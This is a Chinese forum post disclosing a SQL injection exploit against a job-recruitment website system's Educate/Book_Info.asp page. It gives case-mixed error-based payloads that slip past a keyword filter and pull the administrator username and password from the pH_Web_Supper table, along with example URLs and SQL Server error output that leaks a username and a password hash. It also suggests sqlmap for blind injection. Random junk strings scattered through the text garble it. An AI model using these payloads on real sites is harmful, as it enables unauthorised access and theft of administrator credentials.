标题: 网络求职招聘人才网站系统正式版注入 [打印本页] 作者: admin 时间: 2013-2-16 21:44 标题: 网络求职招聘人才网站系统正式版注入 漏洞出现在Educate/Book_Info.asp 1 K C8 Y; x, T$ x- d' ~( ]1 O) B ! R9 V5 i3 ^7 M& ^) o
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出 . G9 Z& ` E* }$ q4 v7 E0 y 9 P3 Z% h! B$ h" U8 d6 D8 ]exp:如下. ^3 Q$ d8 D3 i& N5 U
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper) , B& R4 Z- P$ ]9 X! s查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper) 2 D) \9 Z7 }1 v% z8 W7 v 7 l4 p( W, t5 L" i( A* s+ g0 thttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper) . f( [0 V; o3 m+ Z k2 S 5 ^! }$ R. E! C. p
Microsoft OLE DB Provider for SQL Server 错误 '80040e07' d4 r5 g" `1 q$ ]+ I9 |: N
6 k# K- T {/ u* [; U
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。( ~! O( c5 \7 P+ @3 ~# _2 ]
3 _: A6 K; s$ N0 l0 Q$ \/ d7 f/Educate/Book_Info.asp,行 8! a" l% L. {9 d3 D" q# t
' o: }1 i: Y% f& ]& Q! ehttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)& s! z p; s# b* t; `
$ ^! I- T/ g$ x4 ]' N P
Microsoft OLE DB Provider for SQL Server 错误 '80040e07' ( r! m' n2 s4 S3 z% L3 k* z ! Q! J: {" X m0 z. H将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。" G; f) b. Z9 U2 ?! @ f% P7 \